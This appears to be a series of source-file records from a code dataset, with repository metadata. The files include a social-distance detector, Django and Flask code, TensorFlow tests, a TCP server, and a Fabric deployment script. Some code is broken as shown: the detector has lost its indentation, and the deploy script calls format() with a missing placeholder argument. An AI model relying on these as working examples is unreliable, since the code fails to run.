        wy[i-2,:] = c4dp(a, dy, ny) # derivative along y uses dy and ny
jac[2:nx+3,2:ny+3] = (sy*wx - sx*wy)
f[2:nx+3,2:ny+3] = -jac[2:nx+3,2:ny+3] + lap[2:nx+3,2:ny+3]/re
del sy, wx, sx, wy
return f
|
[
"surajp92@vt.edu"
] |
surajp92@vt.edu
|
18ba5290a9a85aa635408ceba37bbb7ee9cd17dc
|
da47f92a3595f8883a734c195545f2746ddefa36
|
/social-distance-detector Edge/Mobilnet/detect_video_social_distance_streaming.py
|
57ccad9d6e13b5e9d79172866c9d48736e7b92ab
|
[] |
no_license
|
Eufalo/Social-Distance-Detector
|
b2e2a146b47cfb84636ae31d2556e28987ccad58
|
e165e08079f397271cf7c773e4d76b5b12c66332
|
refs/heads/master
| 2022-12-16T06:14:54.375563
| 2020-09-17T22:01:31
| 2020-09-17T22:01:31
| 296,444,322
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,779
|
py
|
# USAGE
# python detect_video.py --model mobilenet_ssd_v2/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite --labels mobilenet_ssd_v2/coco_labels.txt
# import the necessary packages
from edgetpu.detection.engine import DetectionEngine
from scipy.spatial import distance as dist
import birdView_tranform as bd_vie_trans
from imutils.video import VideoStream
from PIL import Image
import numpy as np
import argparse
import imutils
import time
import yaml
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", type=str, default="",
help="path to (optional) input video file")
ap.add_argument("-m", "--model", required=True,
help="path to TensorFlow Lite object detection model")
ap.add_argument("-l", "--labels", required=True,
help="path to labels file")
ap.add_argument("-c", "--confidence", type=float, default=0.6,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
# initialize the labels dictionary
print("[INFO] parsing class labels...")
labels = {}
# loop over the class labels file
for row in open(args["labels"]):
# unpack the row and update the labels dictionary
(classID, label) = row.strip().split(maxsplit=1)
labels[int(classID)] = label.strip()
# load the Google Coral object detection model
print("[INFO] loading Coral model...")
model = DetectionEngine(args["model"])
# initialize the video stream and allow the camera sensor to warmup
print("[INFO] starting video stream...")
vs = cv2.VideoCapture(args["input"] if args["input"] else 0)#VideoStream(src=0).start()
#vs = VideoStream(usePiCamera=False).start()
time.sleep(2.0)
#Flag start detection
detection_flag = False
"""
#Configure the bird eye
with open("config_bird_view.yml", "r") as ymlfile:
cfg = yaml.load(ymlfile)
width_og, height_og = 0,0
corner_points = []
for section in cfg:
corner_points.append(cfg["image_parameters"]["p1"])
corner_points.append(cfg["image_parameters"]["p2"])
corner_points.append(cfg["image_parameters"]["p3"])
corner_points.append(cfg["image_parameters"]["p4"])
width_og = int(cfg["image_parameters"]["width_og"])
height_og = int(cfg["image_parameters"]["height_og"])
img_path = cfg["image_parameters"]["img_path"]
#size_frame = cfg["image_parameters"]["size_frame"]
"""
dim = (700, 400)
'''
To convert pixels to centimetres: once the video starts, press 's' to select
one target object and enter its height in cm; this sets the pixel-to-cm
conversion factor.
'''
conv_one_pixel_cm=0.0
# loop over the frames from the video stream
while True:
# grab the frame from the threaded video stream and resize it
# to have a maximum width of 700 pixels
#frame = vs.read()
(grabbed, frame) = vs.read()
if not grabbed:
break
frame = imutils.resize(frame, width=700,height=700)
orig = frame.copy()
# prepare the frame for object detection by converting (1) it
# from BGR to RGB channel ordering and then (2) from a NumPy
# array to PIL image format
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = Image.fromarray(frame)
img = cv2.imread("bird_eye_img.png")
bird_view_img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
# make predictions on the input frame
start = time.time()
if(detection_flag):
		# social distance converted from cm to pixels
social_distance_min=int(200*conv_one_pixel_cm) if conv_one_pixel_cm >0 else 50
results = model.detect_with_image(frame, threshold=args["confidence"],
keep_aspect_ratio=True, relative_coord=False)
end = time.time()
# initialize the set of indexes that violate the minimum social distance
violate = set()
#Return only the person detection
rects_ = np.array([r.bounding_box.flatten().astype("int") if r.label_id==0 else "" for r in results])
centroids=bd_vie_trans.rect_to_centroids(rects_)
if len(centroids) >= 2:
D = dist.cdist(centroids, centroids, metric="euclidean")
# loop over the upper triangular of the distance matrix
for i in range(0, D.shape[0]):
for j in range(i + 1, D.shape[1]):
# check to see if the distance between any two
# centroid pairs is less than the configured number
# of pixels
if D[i, j] < social_distance_min:#50
# update our violation set with the indexes of
# the centroid pairs
violate.add(i)
violate.add(j)
# loop over the results
for i,r in enumerate(results):
# extract the bounding box and box and predicted class label
box = r.bounding_box.flatten().astype("int")
(startX, startY, endX, endY) = box
cX = int((startX+endX)/2)
cY=int((startY+endY)/2)
color = (0, 255, 0)
if i in violate:
color =(0,0,255)
			# transform the detection to the bird's-eye view
if (r.label_id==0):
bird_points=bd_vie_trans.bird_transform(400,400,frame,[cX,endY])
label = labels[r.label_id]
				# draw bird's-eye view points
x,y = bird_points[0]
				# radius used to visualise the social distance
aux_circl_bird=int(social_distance_min/2) if conv_one_pixel_cm >0 else 25
cv2.circle(bird_view_img, (x,y), aux_circl_bird, color, 2)
cv2.circle(bird_view_img, (x,y), 3, color, -1)
'''
# draw the bounding box and label on the image
cv2.rectangle(orig, (startX, startY), (endX, endY),
color, 2)
'''
			# draw the centroid circle
cv2.circle(orig, (cX, cY), 5, color, 1)
			# draw the social-distance ellipse
aux_elipse_d=int(social_distance_min) if conv_one_pixel_cm >0 else 45
aux_elipse_o=int(aux_elipse_d/2.25) if conv_one_pixel_cm >0 else 20
'''int(social_distance_min/3)'''
cv2.ellipse(orig,(cX,endY),(aux_elipse_d,aux_elipse_o),0,0,360,color,1)
# draw the total number of social distancing violations on the
# output frame
text = "Social Distancing Violations: {}".format(len(violate))
cv2.putText(orig, text, (10, orig.shape[0] - 25),
cv2.FONT_HERSHEY_SIMPLEX, 0.85, (0, 0, 255), 3)
'''
y = startY - 15 if startY - 15 > 15 else startY + 15
text = "{}: {:.2f}%".format(label, r.score * 100)
cv2.putText(orig, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
'''
# show the output frame and wait for a key press
cv2.imshow("Frame", orig)
cv2.imshow("bird", bird_view_img)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
elif key == ord("d"):
		detection_flag = not detection_flag
elif key == ord("s"):
# select the bounding box of the object we want to track (make
# sure you press ENTER or SPACE after selecting the ROI)
box = cv2.selectROI("Frame", orig, fromCenter=False,showCrosshair=True)
		height = input("Target height (cm) ")
		conv_one_pixel_cm = box[3]/float(height)
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
|
[
"adrian.gallegosanchez@gmail.com"
] |
adrian.gallegosanchez@gmail.com
|
4b0cd507b0fe4a7edf15fe8c9200e2b3b34115f5
|
59522e46a73630181f19251b8bfef90e497c2f82
|
/coop_cms/apps/test_app/forms.py
|
a28945b3361774cf45cf14979bb0f7de7f2e8161
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ljean/coop_cms
|
9befe74edda007686007f8566cd2555856099ae8
|
9e6c70afb61b57dc0326fbb64f9d6b19c04f48a1
|
refs/heads/master
| 2023-07-11T16:02:35.945029
| 2023-06-30T12:16:26
| 2023-06-30T12:16:26
| 5,846,409
| 3
| 5
|
NOASSERTION
| 2019-08-30T10:55:02
| 2012-09-17T19:53:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
# -*- coding: utf-8 -*-
"""forms"""
import floppyforms as forms
from coop_html_editor.widgets import get_inline_html_widget
from ...forms.articles import NewArticleForm, ArticleSettingsForm
from ...forms.base import InlineHtmlEditableModelForm
from ...forms.newsletters import NewsletterSettingsForm
from .models import TestClass
class TestClassForm(InlineHtmlEditableModelForm):
"""for unit-testing"""
class Meta:
model = TestClass
fields = ('field1', 'field2', 'field3', 'bool_field', 'int_field', 'float_field')
widgets = {
'field2': get_inline_html_widget(),
}
no_inline_html_widgets = ('field2', 'field3', 'bool_field', 'int_field', 'float_field')
class MyNewArticleForm(NewArticleForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
class MyArticleSettingsForm(ArticleSettingsForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
class MyNewsletterSettingsForm(NewsletterSettingsForm):
"""for unit-testing"""
dummy = forms.CharField(required=False)
|
[
"ljean@apidev.fr"
] |
ljean@apidev.fr
|
ac377b70a426b10934be128abc5faaeed5e06d15
|
6ee04bffb8da70a9165cf653ffe6cfadc9db3e2d
|
/exercicios/vp2/funcao10.py
|
0817a913cba3605080882f0483fcd06a4bdf2f09
|
[] |
no_license
|
dudumendes/fundamentos-programacao-20192
|
3a222a54d4912c7f690b71a4ed8d451dc2148c5b
|
88bc4c56a02b907c60b8054d2807eea8547e5c79
|
refs/heads/master
| 2020-07-07T14:41:34.715156
| 2019-11-26T14:05:29
| 2019-11-26T14:05:29
| 203,378,337
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
def saudar(nome) :
print("Ola, " + nome)
def crazyFunction(x , y) :
x = 2 * y + 3 * x ** (1/2)
y = x * y + 10
return [x , y]
resultado = crazyFunction(144, 20)
print("x = ", resultado[0])
print("y = ", resultado[1])
saudar("Adamor")
|
[
"eduardomendes@Eduardos-MacBook-Pro.local"
] |
eduardomendes@Eduardos-MacBook-Pro.local
|
f8458def60b40aa310866e09606019c8ff2c8aff
|
f65a4f7cb42ae5e8c00b1daa5a0b3eb3ec2a7b60
|
/recognition/models.py
|
646abef020d26203e6cf3314cbef5157b95405c9
|
[] |
no_license
|
AbdelLoughlam/PFE_Projet
|
cffd4cb59d9a0f42b82504d8ce34c9f43881f0c5
|
4d266ab00dbc9278edd25cfea528f18f2bf2ada3
|
refs/heads/main
| 2023-06-24T11:46:58.033027
| 2021-07-23T12:34:23
| 2021-07-23T12:34:23
| 371,154,310
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 304
|
py
|
from django.db import models
from django.contrib.auth.models import User
#
# Create your models here.
#
class Student(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)
def __str__(self):
return self.user.username
|
[
"loughlamabdel@gmail.com"
] |
loughlamabdel@gmail.com
|
9db5b75d65860c2837340291129b71ff7b1509c0
|
c59b7bc356de12827774d3bca79558aba738e1dc
|
/TODO/testTcp.py
|
755ace8831ea084e73f9dc2d2f2eeb8b0b96e514
|
[] |
no_license
|
yishan33/tinyTreasure
|
0e24a860bbe47c993ac790564e6e75783b520e66
|
06a2e8e9ffa5f334daba0f79fc689e97603f5bc5
|
refs/heads/master
| 2020-05-19T22:37:36.966028
| 2015-11-17T02:59:43
| 2015-11-17T02:59:43
| 39,127,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
#!/usr/bin/python
import socket
import select
port = 1111
index = 1
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.bind(('192.168.1.158', port))
serverSocket.listen(10)
print('server is working...')
while True:
client, addr = serverSocket.accept()
    print('already have client------------')
while True:
data = client.recv(1024)
        print('%s %d' % (data, index))
        if not data:
            print('client disconnected')
            break
        backData = 'back %i\r\n\r\n' % index
client.send(backData)
index += 1
# else :
# print data
# if data == '':
# print 'connect'
# else :
# print data
# client.send(backData)
    print('log out')
|
[
"ljl@BMImatoMac-mini.local"
] |
ljl@BMImatoMac-mini.local
|
3330299963393125d538e86655ae557251ea76fc
|
e1a9c0cbb1d40aed46e3c97a16133584a1e8b327
|
/JE_todo/todo_app/migrations/0001_initial.py
|
928cc1f98715580ccdedc637a7c4470a750078be
|
[] |
no_license
|
timfilipowski88/random_projects
|
f9177b60773a324f6c52c398adea4632c2ad5b54
|
a8993be59626534d4f393fb109d31ff36ab66beb
|
refs/heads/master
| 2023-04-28T20:51:26.844964
| 2021-05-15T04:49:32
| 2021-05-15T04:49:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
# Generated by Django 2.2 on 2021-03-28 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='List',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
],
),
]
|
[
"timfilipowski88@gmail.com"
] |
timfilipowski88@gmail.com
|
b393f63f6ac9ee26aceb40dd7bb00e64e25785d3
|
d806dd4a6791382813d2136283a602207fb4b43c
|
/sirius/blueprints/api/remote_service/tula/passive/childbirth/views.py
|
1e86681447f1b9f6b1e9f4f7d3e504d827b7a501
|
[] |
no_license
|
MarsStirner/sirius
|
5bbf2a03dafb7248db481e13aff63ff989fabbc2
|
8839460726cca080ca8549bacd3a498e519c8f96
|
refs/heads/master
| 2021-03-24T12:09:14.673193
| 2017-06-06T16:28:53
| 2017-06-06T16:28:53
| 96,042,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,382
|
py
|
#! coding:utf-8
"""
@author: BARS Group
@date: 03.10.2016
"""
import sys
from flask import request
from sirius.blueprints.api.remote_service.tula.app import module
from sirius.blueprints.api.remote_service.tula.entities import TulaEntityCode
from sirius.blueprints.api.remote_service.tula.passive.childbirth.xform import \
ChildbirthTulaXForm
from sirius.blueprints.monitor.exception import remote_api_method
from sirius.blueprints.monitor.logformat import hook
parent_id_name = 'card_id'
@module.route('/api/integration/<int:api_version>/card/<' + parent_id_name + '>/childbirth/',
methods=['POST', 'PUT', 'DELETE'])
@remote_api_method(hook=hook)
def api_childbirth_change(api_version, **kwargs):
# main_id = kwargs.get(main_id_name)
parent_id = kwargs.get(parent_id_name)
stream_id = kwargs.get('stream_id')
data = None
delete = request.method == 'DELETE'
xform = ChildbirthTulaXForm(api_version, stream_id)
if not delete:
data = request.get_json()
xform.validate(data)
# main_id = data.get('main_id')
# xform.check_params(card_id, main_id, data)
service_name = sys._getframe().f_code.co_name
parents_params = {
parent_id_name: {'entity': TulaEntityCode.CARD, 'id': parent_id},
}
xform.send_messages(parent_id, parent_id_name, data, service_name, request.method, parents_params)
|
[
"paschenko@bars-open.ru"
] |
paschenko@bars-open.ru
|
c6569d076ffb391b828b0b0ad13e3266739a768b
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/attestation/v20210601preview/_enums.py
|
647247b71cec4cfaee5ae075082eafac95c1b2cc
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'PrivateEndpointServiceConnectionStatus',
'PublicNetworkAccessType',
]
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class PublicNetworkAccessType(str, Enum):
"""
Controls whether traffic from the public network is allowed to access the Attestation Provider APIs.
"""
ENABLED = "Enabled"
"""Enables public network connectivity to the Attestation Provider REST APIs."""
DISABLED = "Disabled"
"""Disables public network connectivity to the Attestation Provider REST APIs."""
|
[
"noreply@github.com"
] |
noreply@github.com
|
0db5944ca26ded9a495afea5174be02aae5227b6
|
4671a70af604078c1c75ec11721620c091ee2873
|
/bootcampBot_2.py
|
7d12196e0688da826a29181db98821e546114d8f
|
[] |
no_license
|
raheels88/DiscordPY_Bootcamp
|
a02b11a7755e2e3ebe402c86ba8071e77ec89f8a
|
50bf5de85aa8c3180d49c4c7f35b87714ed3fe40
|
refs/heads/main
| 2023-07-15T17:22:42.551506
| 2021-08-18T18:29:21
| 2021-08-18T18:29:21
| 396,949,602
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
import discord
import os
from yahoo_fin import stock_info as si #import yahoo_fin Python package - used to scrape stock price data from Yahoo Finance
client = discord.Client()
@client.event
async def on_ready():
print('Beep Boop Beep...{0.user}'.format(client) + ' is online')
#### MAKE YOUR BOT FETCH LIVE STOCK PRICES ###
@client.event
async def on_message(message):
msg = message.content
if message.author == client.user:
return
if msg.startswith('$hello'):
await message.channel.send('Hello!')
    if msg.startswith('!price'): #if the message (sent by anyone but the bot) starts with '!price'...
ticker = msg[7:] #assign the variable 'ticker' to be the contents of the message from the 7th character onwards
price = round(si.get_live_price(ticker),2) #get_live_price is a method in the yahoo_fin package - this line gets the live price and rounds to 2 decimal places, and assigns the value to 'price'
await message.channel.send('Price of ' + ticker + ' is $' + str(price)) #Concatenate ticker and price variables with a + sign
client.run(os.getenv('TOKEN'))
|
[
"noreply@github.com"
] |
noreply@github.com
|
0c0a1446e1f0184e7126eb177937b571e856de8d
|
84a96dbd96e926ebb5c658e3cb897db276c32d6c
|
/tensorflow/python/ops/ragged/ragged_segment_op_test.py
|
d29708a5f5d98360502b4aef830d8d7c69c18c5c
|
[
"Apache-2.0"
] |
permissive
|
MothCreations/gavlanWheels
|
bc9189092847369ad291d1c7d3f4144dd2239359
|
01d8a43b45a26afec27b971f686f79c108fe08f9
|
refs/heads/master
| 2022-12-06T09:27:49.458800
| 2020-10-13T21:56:40
| 2020-10-13T21:56:40
| 249,206,716
| 6
| 5
|
Apache-2.0
| 2022-11-21T22:39:47
| 2020-03-22T14:57:45
|
C++
|
UTF-8
|
Python
| false
| false
| 9,618
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged_range op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl.testing import parameterized
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import googletest
def prod(values):
val = 1
for v in values:
val *= v
return val
# return reduce(lambda x, y: x * y, values, 1)
def mean(values):
return 1.0 * sum(values) / len(values)
def sqrt_n(values):
return 1.0 * sum(values) / math.sqrt(len(values))
@test_util.run_all_in_graph_and_eager_modes
class RaggedSegmentOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def expected_value(self, data, segment_ids, num_segments, combiner):
"""Find the expected value for a call to ragged_segment_<aggregate>.
Args:
data: The input RaggedTensor, expressed as a nested python list.
segment_ids: The segment ids, as a python list of ints.
num_segments: The number of segments, as a python int.
combiner: The Python function used to combine values.
Returns:
The expected value, as a nested Python list.
"""
self.assertLen(data, len(segment_ids))
# Build an empty (num_segments x ncols) "grouped" matrix
ncols = max(len(row) for row in data)
grouped = [[[] for _ in range(ncols)] for row in range(num_segments)]
# Append values from data[row] to grouped[segment_ids[row]]
for row in range(len(data)):
for col in range(len(data[row])):
grouped[segment_ids[row]][col].append(data[row][col])
# Combine the values.
return [[combiner(values)
for values in grouped_row
if values]
for grouped_row in grouped]
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Int(self, segment_op, combiner, segment_ids):
rt_as_list = [[0, 1, 2, 3], [4], [], [5, 6], [7], [8, 9]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllEqual(segmented, expected)
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Float(self, segment_op, combiner, segment_ids):
rt_as_list = [[0., 1., 2., 3.], [4.], [], [5., 6.], [7.], [8., 9.]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllClose(segmented, expected)
def testRaggedRankTwo(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids1 = [0, 2, 2, 2]
segmented1 = ragged_math_ops.segment_sum(rt, segment_ids1, 3)
expected1 = [[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[411, 412], [321, 322], [331]] # row 2
] # pyformat: disable
self.assertAllEqual(segmented1, expected1)
segment_ids2 = [1, 2, 1, 1]
segmented2 = ragged_math_ops.segment_sum(rt, segment_ids2, 3)
expected2 = [[],
[[111+411, 112+412, 113, 114], [121+321, 322], [331]],
[]] # pyformat: disable
self.assertAllEqual(segmented2, expected2)
def testRaggedSegmentIds(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [], [1, 1, 2], [2]])
segmented = ragged_math_ops.segment_sum(rt, segment_ids, 3)
expected = [[],
[111+321, 112+322, 113, 114],
[121+331+411, 412]] # pyformat: disable
self.assertAllEqual(segmented, expected)
def testShapeMismatchError1(self):
dt = constant_op.constant([1, 2, 3, 4, 5, 6])
segment_ids = ragged_factory_ops.constant([[1, 2], []])
self.assertRaisesRegexp(
ValueError, 'segment_ids.shape must be a prefix of data.shape, '
'but segment_ids is ragged and data is not.',
ragged_math_ops.segment_sum, dt, segment_ids, 3)
def testShapeMismatchError2(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [1], [1, 1, 2], [2]])
# Error is raised at graph-building time if we can detect it then.
self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*',
ragged_math_ops.segment_sum, rt, segment_ids, 3)
# Otherwise, error is raised when we run the graph.
segment_ids2 = ragged_tensor.RaggedTensor.from_row_splits(
array_ops.placeholder_with_default(segment_ids.values, None),
array_ops.placeholder_with_default(segment_ids.row_splits, None))
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*'):
self.evaluate(ragged_math_ops.segment_sum(rt, segment_ids2, 3))
if __name__ == '__main__':
googletest.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
636287a026b036c4db22cc1f8fbad2a93d1e3f6b
|
90e39e45d469bb5dd9cb36805a88c97f41c147de
|
/2-do_deploy_web_static.py
|
5fc6c711832e5b59a00fa0831b049af1e986aac4
|
[] |
no_license
|
Noeuclides/AirBnB_clone_v2
|
372b3d01ba76d41a79dca166d6ca7d471749a07d
|
13fac5127af0149e7bef9a94b70e6d2746eeb4fd
|
refs/heads/master
| 2020-07-03T19:16:10.404783
| 2019-09-11T00:42:29
| 2019-09-11T00:42:29
| 202,020,044
| 0
| 2
| null | 2019-08-19T03:08:39
| 2019-08-12T22:44:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#!/usr/bin/python3
from datetime import datetime
from fabric.api import *
from os import path
'''automate deployment with fabric
'''
'''env.user = 'localhost'
'''
env.hosts = ['35.231.53.89', '35.190.176.186']
def do_pack():
'''making a pack on web_static folder
'''
now = datetime.now()
file = 'web_static_' + now.strftime("%Y%m%d%H%M%S") + '.' + 'tgz'
local("mkdir -p versions")
check = local("tar -cvzf versions/{} web_static".format(file))
if check is not None:
return file
else:
return None
def do_deploy(archive_path):
'''distribute an archive to web servers
'''
print(archive_path)
print(str(path.exists(archive_path)))
    if not path.exists(archive_path):
        return False
oper = []
file = archive_path.split("/")
oper.append(put(archive_path, '/tmp'))
folder = file[1].split('.')
print(folder[0])
oper.append(
run("mkdir -p /data/web_static/releases/{}".format(
folder[0])))
oper.append(run(
"tar -xzf /tmp/{file} -C /data/web_static/releases/{}".format(
file[1], folder[0])))
oper.append(run("rm /tmp/{}".format(file[1])))
oper.append(run("mv /data/web_static/releases/{0}/web_static/* /data/web_static/releases/{0}".format(
folder[0])))
oper.append(run(
"rm -rf /data/web_static/releases/{}/web_static".format(
folder[0])))
oper.append(run("rm -rf /data/web_static/current"))
oper.append(run(
"ln -s /data/web_static/releases/{}/ /data/web_static/current".format(
folder[0])))
print(oper)
for op in oper:
if op is False:
return False
return True
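# A typical invocation with Fabric 1.x (the archive name below is illustrative):
#   fab -f 2-do_deploy_web_static.py do_pack
#   fab -f 2-do_deploy_web_static.py do_deploy:archive_path=versions/web_static_20190911004229.tgz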
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
d6c678a5c8917fadd314e706e27629319dcc78b8
|
0a8198af8ca152a26b7bbbf0006bf19f37cd3a0c
|
/modules/zuul/files/zuul-test-repo.py
|
3b790b81f2975da22887495a663e7fbc2a6cf5f4
|
[] |
no_license
|
dkuspawono/puppet
|
938f05ea77cea35059d6ff1eb0b4c2b89a170a00
|
75e0dd3698efa8e7cf95f6ef1348d16a299faa82
|
refs/heads/production
| 2021-05-12T01:27:57.528282
| 2019-08-03T01:15:51
| 2019-08-03T01:15:51
| 117,557,149
| 0
| 0
| null | 2018-08-23T11:51:02
| 2018-01-15T14:42:53
|
Puppet
|
UTF-8
|
Python
| false
| false
| 2,172
|
py
|
#!/usr/bin/env python2
"""Easily trigger zuul pipelines for a Gerrit repository."""
# Copyright 2015 Legoktm
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
